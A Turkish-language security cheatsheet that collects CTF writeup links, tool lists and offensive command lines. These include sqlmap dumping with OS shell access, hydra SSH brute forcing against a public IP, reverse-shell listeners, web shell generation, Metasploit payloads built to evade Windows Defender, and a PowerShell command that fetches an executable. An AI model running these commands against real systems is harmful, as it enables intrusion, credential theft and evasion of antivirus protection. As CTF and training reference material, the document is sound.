Siber Güvenlik Genel (Arşiv – Cheatsheet)

SİBER GÜVENLİK GENEL ARŞİVİ


Geçmiş CTF lerden Writeuplar

https://github.com/berkayyildi/CTF-WRITEUP
https://github.com/stmctf
http://www.halitalptekin.com/hacettepe-ctf.html
https://www.aucyberclub.org/cozumler/2017/02/17/cypmctfcozumleri.html
https://blog.crypttech.com/2017/05/2-geleneksel-stajyer-ctf-soru-ve_30.html
https://www.ismailkundakci(.)com/adeosecurity-iws17-ctf-cozumleri/http://www.mucahittopal.com/dkhos-ctf-capture-the-flag-cozumlerim.html
http://www.omurfurkanulu.com/blog/konu/egitim/lostarctf/lostarctf2017.html

CTF Yardımcı Araçlar: https://pentest.ws/

Zafiyetli makine imajları :
https://www.vulnhub.com
https://www.hackthebox.eu

Online Öğretici Makinalar: https://attackdefense.com

Öğretici Siteler:
https://www.hellboundhackers.org
https://ctf101.org/
https://www.root-me.org/
Daha Fazlası

Diğer Bloggerlar:
https://www.mertsarica.com
https://canyoupwn.me/
http://www.meryemakdoğan.com
http://cyberjungles.com/
https://uceka.com
https://medium.com/mcoskuner
http://www.abdullahog.lu

CTF Haber: https://ctftime.org/ctfs

Siber Güvenlik Haber ve Araç Siteleri:

https://null-byte.wonderhowto.com
https://thehackernews.com
https://www.kitploit.com
https://www.hackread(.)com
https://kalilinuxtutorials.com

Toolkit Collections:
https://0xsp.com/offensive/red-teaming-toolkit-collection

Kullanılabilecek Araçlar:
file (Dosyanın magic bitlerine bakarak ne olduğunu anlamak için)
exiftool (Resim dosyalarından bilgi çıkarmak için)
Strings tool (Dosya içerisinde geçen string i çıkarmak için)
Online Photoshop https://www.photopea.com/ (Resmin Parlaklığını vs oynamak)
Online Compiler https://coder.com/
Kali Atom Kurulumu:


root@kali:~# apt-get install gvfs gvfs-common gvfs-daemons gvfs-libs gconf-service gconf2 gconf2-common gvfs-bin psmisc
root@kali:~# wget https://atom.io/download/deb && dpkg -i atom-amd64.deb

String Manipulation – Encryption

Cyber Chef: https://gchq.github.io/CyberChef/

CAESAR Decode Detailed : https://cryptii.com/pipes/caesar-cipher

MD5 Crackers: https://hashtoolkit.com https://crackstation.net/ https://hashkiller.co.uk/Cracker/MD5

HASH IDENTIFY
https://www.onlinehashcrack.com/hash-identification.php
https://www.tunnelsup.com/hash-analyzer/
https://md5hashing.net/hash_type_checker/

XOR
http://strelitzia.net/wasXORdecoder/wasXORdecoder.html

VIGINERE
https://www.dcode.fr/vigenere-cipher
https://cryptii.com/vigenere-cipher

ROT – ROT 0-25
https://www.dcode.fr/rot-cipher
http://theblob.org/rot.cgi

Substitution Cipher: https://www.quipqiup.com

Hex/Dec/Oct/Ascii Converter

YERINE KOYMA (Substitution Cipher)
http://substitution.webmasters.sk/simple-substitution-cipher.php
https://www.guballa.de/substitution-solver

Binary file editor tool online:
https://hexed.it/


— Steganography (Stego)—

Steghide(JPG/BMP/WAV): root@kali:~# steghide extract -sf picture.jpg Kaynak

Steghide Bruteforce (JPG WAV): pip3 install stegcracker

ZSTEG (PNG & BMP): gem install zsteg

Image Steganography Lower Bits: https://incoherency.co.uk/image-steganography/#unhide

Steganography JPEG WAV AU: https://futureboy.us/stegano/decinput.html

Stegsolve JAR: Photoshop yerine kullanabilecek araç Download

Online ExifTool: http://metapicz.com/#landing

Unutulmaması gereken Basit Araçlar: strings, binwalk, foremost, Dcode.fr

Wawsteg: Download

Outguess : Steghide alternatifidir

Ses Spektrum Analizi:
Audacity yada Sonic Visualizer (Spectogram katmanını Mixed channel)

Original Image Difference Comparison : https://pequalsnp-team.github.io/writeups/SC2

Video’dan Frame Çıkarma (mpg): https://stackoverflow.com/questions/10957412/fastest-way-to-extract-frames-using-ffmpeg


Ağ Paket Analiz Araçları:

Wireshark

Airodump: root@kali:~# airodump-ng --uptime -r wireless.cap

Charles de HTTP isteklerini okuyabiliyor.

TLS 1.3 için BurpSuite JDK 11 ile çalıştırılmalı!


Ağ Tarama: root@kali:~# netdiscover -r 192.168.1.0/24
Port Tarama: root@kali:~# nmap -sC -sV -v 192.168.1.123


SQLMAP Kullanımı:

root@kali:~# sqlmap -u "http://test.com/users.php?id=4" --dbs # Veritabanlarını Alır
root@kali:~# sqlmap -u "http://test.com/users.php?id=4" -D DatabaseAdi --tables # Tabloları Alır
root@kali:~# sqlmap -u "http://test.com/users.php?id=4" -D DatabaseAdi -T Tabloadi --columns # Kolonları Alır
root@kali:~# sqlmap -u "http://test.com/users.php?id=4" -D DatabaseAdi -T Tabloadi --dump # Tüm Colum Kayıtlarını Dump eder
root@kali:~# sqlmap -u "http://test.com/users.php?id=4" -D DatabaseAdi -T Tabloadi -C user,pass --dump #Seçili Column Kayıtlarını Dump eder

Level Parametreleri:–level=5 –risk=3 , WAF Bypass –tamper=space2comment , VT Tipi: –dbms=MySQL , Thread : –threads 5 , Shell Alma : –os-shell , Auto Submit :–batch , UserAgentMobile : –mobile , Kaynak

Diğer Parametreler –prefix=”” , –technique=E

Veritabanı Şeması : root@kali:~# sqlmap -u “http://test.com/users.php?id=4” -D DatabaseAdi –schema

RAW dump ile scan (BurpSuite çıktısı ile yada Charles HTTP 1.1 RAW):

root@kali:~# sqlmap -r /file.txt -p “user” –dbs Kaynak


WordPress Scan Tool:

root@kali:~# wpscan --url 192.168.1.12 (Scan)
root@kali:~# wpscan --url 192.168.1.123 --wordlist rockyou.txt --username admin  (BruteForce) (Deprecated)
root@kali:~# wpscan --url http://local.com -P /usr/share/wordlists/rockyou.txt -U admin threads 20 (BruteForce 2)

HYDRA FTP Bruteforce: root@kali:~# hydra -l root -P /usr/share/wordlists/rockyou.txt 185.126.179.211 -t 4 -V ssh
(HYDRA Bruteforce için Daha Fazlası)


Nikto Web Scanner: root@kali:~# nikto -h 192.168.1.123


Binwalk Extract All:

root@kali:~# binwalk –dd=’.*’ music.mp3

Binwalk just extract JPEGS: root@kali:~# binwalk system32.dll -D jpeg

Bedava proxy alma (Concurrent connection limited): https://gimmeproxy.com/

Mobile DTMF Tones Detection:

http://dialabc.com/sound/detect/
http://www.dialabc.com/words/search/
http://www.phonespell.org/
Android App: https://play.google.com/store/apps/details?id=cz.muni.fi.jonny.dtmf

APK ANALIZI:

https://n0where.net/best-android-tools
https://securityonline.info/android-arsenal-dynamic-analysis-tools/
https://github.com/ashishb/android-security-awesome
https://github.com/ac-pm/Inspeckage

SandBox: https://github.com/Areizen/Android-Malware-Sandbox
Android Online Emulator: https://appetize.io

Android x86 Emulator: GenyMotion (Proxy Settings)


Frida Kullanımı Detaylı Anlatım:

Frida Örnekleri: https://github.com/berkayyildi/Frida-Android-Hooking/


CEWL Kullanımı:
root@kali:~# cewl –w wordlist.txt –d 5 –m 7 www.sans.org

-w parametresi wordlistin adı veya yazılacağı dosyayı belirtir.
-d parametresi derinliği, CeWL’in sitedeki kelimeleri alırken ineceği derinliği belirtir.
-m parametresi minimum karakter sayısını belirtir.

Crunch ile Wordlist oluştuma:

root@kali:~# crunch [minimum length] [maximum length] [charset / extra options]

root@kali:~# crunch 1 4 abc123 > wordlist.txt

-b: The maximum size of the wordlist (along with -o START)
-c: Numbers of lines in the wordlist (along with -o START)
-d: Limit the number of duplicate characters
-f: Specify a list of character sets from the charset.lst file
-o: Output the wordlist to a file
-s: Specify a particular string to begin the words with
-p: Print permutations without repeating characters (cannot be used with -s)
-z: compress the output wordlist file, accompanied by -o

-p parametresi ile istenen karakterler karıştırılarak harf tekrarı olmadan permitasyonları üretilir (Belirlenen parola uzunluğu gözardı edilir) (abc için bac cab.. gibi 6 tane)

Kelimelerin permüstasyonuyla wordlist oluşturma: root@kali:~# crunch 4 5 -p car home plane

Hazır Charsetlerle wordlist oluşturma:root@kali:~# crunch 4 4 -f /usr/share/crunch/charset.lst lalpha-sv (Charset listesi için dosyayı inceleyin)

Belli bir patternde wordlist oluşturma:

 root@kali:~# crunch 10 10 -t @@@@@@0728

@ will insert lower case characters
, will insert upper case characters
% will insert numbers
^ will insert symbols

Foremost Tool (Silinen Dosya Kurtarma):

root@kali:~# foremost -t doc,jpg,pdf,xls -i image.dd

PDF Forensic: PDFStreamDumper

Forensic Imaj Açma Yazılımı: Forensic Image Pro v6 – AD1 vs supported

Online GEEK Tools:

http://hackertyper.com
http://geektyper.com


Malware Analysis

Forensic Windows Evidence Collector: 
https://binalyze.com/products/irec-free/

Windows Değişen Dosyaları Bulma: FolderChangesView

Process Hacker: https://processhacker.sourceforge.io/

Comodo Cleaning Essentials

Online Malware Anaizi: https://app.any.run/

VMware Anti-AntiVM: https://github.com/hzqst/VmwareHardenedLoader

Forensic

Volatility GUI: https://www.osforensics.com/tools/volatility-workbench.html


RAR2JOHN & John:

root@kali:~# rar2john rarismi.rar > rarhashi.txt && john rarhashi.txt –wordlist=rockyou.txt

ZIP File Bruteforce:

root@kali:~# fcrackzip -u -D -p rockyou.txt rarismi.zip

Kali Default Wordlist Directory: root@kali:~# cd /usr/share/wordlists/


Saving .so file with IDA:

Edit –> Patch Program –> Apply patches to input file

.so file Analysis:

Kullanılan Uygulama:snowman-v0.1.2-win-x64

Shellcode To exe

http://sandsprite.com/shellcode_2_exe.php

UPX UNPACK:

upx.exe -d -o calc_upx.exe calc.exe  (Anlatım)

Javascript Deobfuscation:

http://jsnice.org

Detect It Easy is a Packer identifier:

http://ntinfo.biz/index.html

Twitter Secret Message:

http://holloway.co.nz/steg/

Linux Find File : root@kali:~# find . -type f -exec grep -H ‘aranacak_kelime’ {} \;

Hexdump 2 File:

root@kali:~# xxd -r 3.txt > dosyam


PHP Shell B374K

https://code.google.com/archive/p/b374k-shell/downloads

Weevely PHP Shell Generator

root@kali:~# weevely generate myshell.php


NC İle Dinleme (Reverse Shell Alma):

root@kali:~# nc -lvp 4444

Upgrade Reverse Shell To Interactive Shell:

root@kali:~# nc -lvp 4444
//ReverseShell bağlantısını aldıktan sonra
root@kali:~# python -c 'import pty; pty.spawn("/bin/bash")'
Ctrl + Z
root@kali:~# stty raw -echo
root@kali:~# fg
//To finish exit() for python , after than exit do not forget to reset terminal

Windows Interactive Powershell: exe ve ps1 bağlantı
https://github.com/antonioCoco/ConPtyShell

Windows Get All Powershell History

Windows PowerSploit

Curl ile Blind HTTP Request Dump: Google: http request dump online

Her Dilde Reverse Shell Payload: https://alamot.github.io/reverse_shells/

Upgrade SSH to Meterpreter:

msfconsole
use scanner/ssh/ssh_login
use multi/manage/shell_to_meterpreter

DOCKER METASPLOIT:

docker run --rm -it \
       -p 4444:4444 -p 80:80 -p 8080:8080 \
       -p 443:443 -p 445:445 -p 8081:8081 \
       strm/metasploit

Interactive Shell:
stty raw -echo && cat <(echo “python -c ‘import pty; pty.spawn(\”/bin/bash\”)'”) – | nc -lvp 4444 (More Info)

NC ile Bağlantı: root@kali:~# nc 192.168.1.100 80


Privilege Escalation Scripts:

https://github.com/rebootuser/LinEnum
https://github.com/PenturaLabs/Linux_Exploit_Suggester
http://www.securitysift.com/download/linuxprivchecker.py
https://github.com/pentestmonkey/unix-privesc-check
https://github.com/PenturaLabs/Linux_Exploit_Suggester
http://www.securitysift.com/download/linuxprivchecker.py
https://github.com/pentestmonkey/unix-privesc-check
https://www.kitploit.com/2018/08/lynis-267-security-auditing-tool-for.html
https://www.hackingarticles.in/linux-privilege-escalation-via-automated-script/
Suid : https://pentestlab.blog/category/privilege-escalation/


Privilege Escalation Best Practices:

Okunası Kaynaklar:
Guide Linux Privilege Escalation

SUID biti işaretli dosyalara dikkat değiştirme iznimiz varmı bakalım.

SUID li dosya bir başka uygulamayı çağırıyorsa time(); gibi PATH’i değiştirerek bu uygulama yerine kendi uygulamamızın çalışmasını sağlayabiliriz. (Örnek Makina)

SUID bit işaretli şüpheli binary ltrace ile syscall lar incelenebilir yada reverse edilerek incelenebilir.

Crontabları kontrol etmeliyiz root olarak çalıştırılan işlemi düzenleyebilirsek root olabiliriz (Örnek Makina)

SUID FTP Exploit


Hashcat:

https://www.kitploit.com/2018/08/hashcat-v421-worlds-fastest-and-most.html

Instagram Bruteforce:

https://github.com/thelinuxchoice/instashell

Eternalblue Scanner:

https://github.com/nsa/eternalblue-scanner

Ücretsiz Shell Serverları: (Reverse shell vs için)

http://www.freeshellz.net/
https://www.xshellz.com/


Wifi Hacking:

Wifite aracı ile WEP, WPS, WPA2 için çeşitli yöntemleri otomatik dener.

Wpa handshake capture yönteminde .cap alındıktan sonra .cap dosyasını https://hashc.co.uk/cap2hccapx ile hccapx e dönüştürüp windowsta hashcat ile GPU yardımıyla kırabiliriz.

.\hashcat64.exe -m 2500 .\Berkay.hccapx .\rockyou.txt


—Cyber Intelligence (Siber İstihbarat) (Open Source Intelligence) (Osint)—

Virustotal, Github, Sosyal Medya, Google Maps, pastebin etc.

Reverse IP Lookup:
Bing de ile arama yapma
https://www.robtex.com
https://www.yougetsignal.com/tools/web-sites-on-web-server/
https://hackertarget.com/reverse-ip-lookup/
https://viewdns.info/reverseip/
http://reverseip.domaintools.com

DNS HISTORY: https://securitytrails.com

WEB HISTORY: https://archive.org/web/

Built With : https://builtwith.com/

Shodan, Censys, Immuniweb, Maltego, Pastebin, gitmemory.com, searchdns.netcraft.com, dnsdumpster.com, Virustotal, Sublist3r Script , Zoomeye

Google Dork: site:facebook.com
https://securitytrails.com/blog/google-hacking-techniques

IBM X-Force Exchange: https://exchange.xforce.ibmcloud.com/

The Harvester: https://github.com/laramies/theHarvester

Google Drive Search Dork: https://securitronlinux.com/debian-testing/google-search-terms-to-find-interesting-stuff-on-google-drive/

Daha Fazla Bilgi : https://securitytrails.com/blog/top-20-intel-tools

OPEN FTP LIST: http://www.mmnt.net

Arşiv: https://www.prismacsi(dot)com/acik-kaynak-istihbarati-osint/


Windows Enumeration CHEATSHEET:
Enumeration Cheat Sheet For Windows


Metasploit

Metasploit Global LHOST Set: setg lhost tun0

Metasploit Reverse Shell Exe Oluşturma
use evasion/windows/windows_defender_exe
set PAYLOAD windows/meterpreter/reverse_tcp (set PAYLOAD windows/shell/reverse_tcp)
set LPORT 443
set LHOST tun0
exploit

Metasploit Handler
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp (set PAYLOAD windows/shell/reverse_tcp) (windows/x64/meterpreter/)
set LPORT 443
set LHOST tun0
exploit

Metasploit Shell to Meterpreter Session:
use post/multi/manage/shell_to_meterpreter
set session 1
exploit
sessions

Reverse Shell Payload Generator:
use multi/script/web_delivery
set payload
set target
set lhost

Windows Powershell Download:
powershell iwr http://172.16.1.66/berkay.exe -OutFile C:\Users\username\AppData\Local\Temp\berkay.exe

Meterpreter Windows Exploit Suggester:
use post/multi/recon/local_exploit_suggester


Reverse Shell List:
Get Windows Oneliner Reverse Shell
Windows Get and Execture Oneliners
Bash Perl ASP Python PHP Ruby Java nc Telnet Powershell VBS Socat RunDll32 etc. Reverse Shell
Fully Interactive Reverse Shell for Windows
POWERSHELL FRAMEWORK Nishang (Awesome Scripts)
Oneliner Linux reverse shell online (python perl nc sh)

Windows – Privilage Esc Awesome Doc:

https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Windows%20-%20Privilege%20Escalation.md

Passive Subdomain Finder Script: pdlist https://github.com/gnebbia/pdlist

Samba (SMB) Enum Port 139, 445:

Enumeration Tool : https://github.com/m8r0wn/nullinux
Enumeration Tool 2 : smbmap

Samba Connect as FTP: smbclient //10.10.10.123/ShareName -U guest

Samba mount & samba VHD mount:
https://medium.com/@abali6980/mounting-vhd-files-in-kali-linux-through-remote-share-smb-1c4d37c22211

SAM File Hash Okuma:

Gerekli Dosyalar; /Windows/System32/config/SYSTEM, /Windows/System32/config/SAM
root@kali:# samdump2 SYSTEM SAM

PWN (PAWN):

Disable ASLR : echo 0 > /proc/sys/kernel/randomize_va_space
Compile W/O Stack Protection: gcc crash.c -m32 -z execstack -o crash
Serve executable with socat: socat TCP-LISTEN:7777,reuseaddr,fork EXEC:"./pwn1"
Show binary library dependencies : ldd
Buffer Owerflow Pattern Generator: https://wiremask.eu/tools/buffer-overflow-pattern-generator/
TOOL: pwntools
Binary Security Check Command: checksec
( if (NX=1) Stack not Executable || If RELRO Enabled ASLR Supported)

CheatSheet: https://github.com/Naetw/CTF-pwn-tips


Kali Tweaks & VMWare Settings:

Parolasız root oturum açma:
/etc/gdm3/daemon.conf dosyasının ilgili satırlarını uncomment edin ve şöyle gözükmeli;

[daemon]
# Enabling automatic login
  AutomaticLoginEnable = true
  AutomaticLogin = root

VmWare Copy Paste Fix:

root@kali:~# apt-get autoremove open-vm-tools
root@kali:~# apt-get install open-vm-tools-desktop

VmWare & Windows Error Fix: bcdedit /set hypervisorlaunchtype off
VmWare Device/Credential Guard Fix: Youtube İzle
VmWare Network Settings: (Bridge, NAT, Host Only) : Youtube İzle